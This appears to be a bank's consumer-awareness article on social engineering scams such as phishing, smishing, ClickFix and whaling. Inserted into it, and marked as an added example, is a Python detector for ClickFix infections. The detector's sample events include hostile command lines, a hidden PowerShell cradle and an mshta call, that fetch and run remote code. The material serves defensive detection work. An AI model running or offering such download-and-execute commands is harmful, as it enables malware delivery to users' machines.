
Social Engineering: The Human Side of Modern Scams

By Royal Bank of Canada

Published July 21, 2025 • 5 Min Read

Unlike many cyberattacks that focus on breaking through technical defenses, social engineering works by manipulating human behaviour – scammers gain trust, exploit vulnerabilities or create anxiety, fear or delight in people to gain access to systems and data.

Incredibly common and getting more sophisticated every year, social engineering forms the foundation of many scams – in fact, it’s been reported that 98% of cyberattacks rely on social engineering at some stage.

Why social engineering is so common

Social engineering is a common tactic because it works. Human error is predictable – scammers know that people can be tricked, and they know how to take advantage of their sensitivities. It’s also low cost – it’s much cheaper and faster for criminals to manipulate people than it is to try to break through layers of technical security. Carrying out social engineering attacks is also getting easier, as AI-generated voices, videos and messages allow scammers to create convincing material that can fool their targets.

Types of social engineering attacks

There are many different social engineering methods, each with its own strengths and typical targets. Here's a rundown of some of the most common.

Phishing

Phishing is the most common way of carrying out a social engineering scheme – 90% of all attacks start with a phishing email.

In a phishing attempt, a cybercriminal will craft a convincing email posing as a reputable organization such as a bank, government or other trusted business. A typical phishing email will claim a data breach, contest or account issue and try to trick you into clicking a link to resolve the problem or take advantage of a prize. That link will lead to a fake website (that looks authentic), where you’ll be asked to enter your personal information such as a credit card number, account number, password, date of birth and/or driver’s license.

Spear phishing

While phishing is generally a "bulk" activity, where cybercriminals send the same lure to as many people as possible, spear phishing occurs when a fraudster specifically targets an individual or organization to obtain particular sensitive information.

Smishing

Smishing – or SMS phishing – uses text messages to trick people into downloading malware or sharing information. Given that SMS open rates are upwards of 98% (compared to a 26.8% open rate for emails), it is an increasingly popular way to attempt a social engineering attack.

ClickFix

A relatively new technique that was first seen in the spring of 2024, ClickFix tricks the target into running a malicious command on their own computer. The attack normally begins with a pop-up window that alerts the user to a technical problem. To fix it, they are told to perform a few simple steps, which involve clicking a button or copying a line of text and pasting it into the Windows "Run" dialog (Win+R) or a terminal window. The pasted command then downloads and runs malware – infecting the device and potentially a whole network. Because the victim runs the command themselves, the usual browser download warnings never appear.

Common “problems” include:

  • Unable to display the page – need to refresh browser: The user is told they need to install a browser update to display the page

  • Error loading document: The user can't view a document and is shown a notification to install a plugin to view it online

  • Error opening a document from an email: Similar to the above, the user can't open a file from an email and is directed to download a plugin, with a 'how to fix' button that walks them through pasting the command
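The telltale trace a ClickFix infection leaves on the endpoint is a script interpreter started from the Run dialog (so its parent is explorer.exe) with a command line that fetches and executes something from the internet. The following is an added example, not code from the original article or from RBC: a small Python detector run over constructed process-creation records. The event shape, the list of interpreters and the indicator patterns are assumptions for the example; the explorer.exe-parent assumption is stated in a comment.

```python
import ntpath
import re

# Constructed sample process-creation events (not real telemetry). The fields
# mimic a common Sysmon/EDR shape: parent image, child image, full command line.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c \"iex (iwr 'http://203.0.113.10/fix.txt' -UseBasicParsing)\""},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://203.0.113.10/verify.hta"},
    # Benign: an editor launched from Explorer.
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
    # Benign: PowerShell started from a shell, not from the Run dialog.
    {"parent": r"C:\Program Files\Git\bin\bash.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c Get-ChildItem"},
    # Benign: PowerShell from Explorer, but running a local script with no download cradle.
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -NoExit -File C:\Users\alice\scripts\backup.ps1"},
]

# Interpreters a pasted ClickFix command typically lands in (assumed list).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}

# Command-line traits of a ClickFix payload: reach out to the internet, execute
# what comes back, and keep the window out of sight.
INDICATORS = {
    "remote_url": re.compile(r"https?://", re.I),
    "download_cradle": re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|curl|certutil)\b", re.I),
    "inline_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "encoded_command": re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\b|frombase64string", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
}


def clickfix_indicators(cmdline):
    """Return the names of the ClickFix-style traits present in a command line."""
    return {name for name, rx in INDICATORS.items() if rx.search(cmdline)}


def is_run_dialog_launch(event):
    """True when an interpreter was started directly under explorer.exe.

    Assumption for this example: a command pasted into the Win+R Run dialog
    shows up with explorer.exe as its parent. A double-clicked shortcut does
    too, which is why the command-line indicators are required as well.
    """
    parent = ntpath.basename(event["parent"]).lower()
    child = ntpath.basename(event["image"]).lower()
    return parent == "explorer.exe" and child in INTERPRETERS


def analyze(events, min_indicators=1):
    """Flag explorer.exe -> interpreter launches whose command line looks like a ClickFix payload."""
    alerts = []
    for ev in events:
        if not is_run_dialog_launch(ev):
            continue
        hits = clickfix_indicators(ev["cmdline"])
        if len(hits) >= min_indicators:
            alerts.append({"image": ntpath.basename(ev["image"]).lower(),
                           "cmdline": ev["cmdline"],
                           "indicators": sorted(hits)})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(f"[ClickFix?] {alert['image']}: {', '.join(alert['indicators'])}\n    {alert['cmdline']}")
```

Raising `min_indicators` trades recall for precision: a bare `curl https://...` typed into Run is worth a look but is not proof of compromise, whereas a hidden PowerShell window pulling a script and piping it to `iex` rarely has an innocent explanation.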

Quid Pro Quo

In this social engineering attack, a fraudster impersonates an IT professional, offering technical assistance. In exchange for addressing an issue, they ask for sensitive information and login credentials.

Honey Trapping (romance scams)

In a honey trapping scam, a scammer uses flattery and attraction to manipulate someone into revealing sensitive information, sending money or compromising themselves in other ways.

Whaling

Whaling is a phishing attack that targets high-profile company employees (referred to as "whales" in cybercrime). These attacks are generally highly personalized, as the fraudster invests considerable time researching the target.

How to defend against social engineering scams

While social engineering attacks are common and sophisticated, there are ways to spot red flags and defend against them. Here are some tips for protecting yourself and your information:

  • Carefully check emails, including names, addresses and copy

    • Check for spelling and grammar mistakes

    • Look closely at the email address – many addresses will look like one in your contact list but will be slightly different (e.g., an extra letter, or a "0" instead of an "O")

  • Recognize common phishing email subject lines: Phishing emails typically rely on an urgent or enticing subject line to hook a target. Common lines to watch out for include:

    • Notice: Service cancellation

    • Payment failed: Update your billing information

    • Your account has been suspended

    • You’ve won a $500 gift card

    • Get paid to work from home

    • Shipping issue – please confirm address

  • Pause before acting

    • Phishing messages are designed to create a strong emotion. Before reacting, slow down and consider the source and content of the message

  • Verify the identity of the sender

    • If it’s someone you don’t know personally, do some research into who they are and contact them on an alternate channel

    • If a message from a friend or colleague sounds off, treat it as suspicious

    • If you receive a message from an established organization asking for sensitive information, contact them using a verified phone number to confirm the request – don’t respond to the email or text

  • Shrink your online footprint

    • The more you share online and on social media, the more information hackers have to target you. Real-time vacation photos, pet names and school details can all be used to build rapport in a message

Technology may evolve, but as long as scammers can effectively fool people, social engineering will remain one of the most effective tools they use. The best way to fight back is to question anything that feels off, pause before you click and trust your instincts.
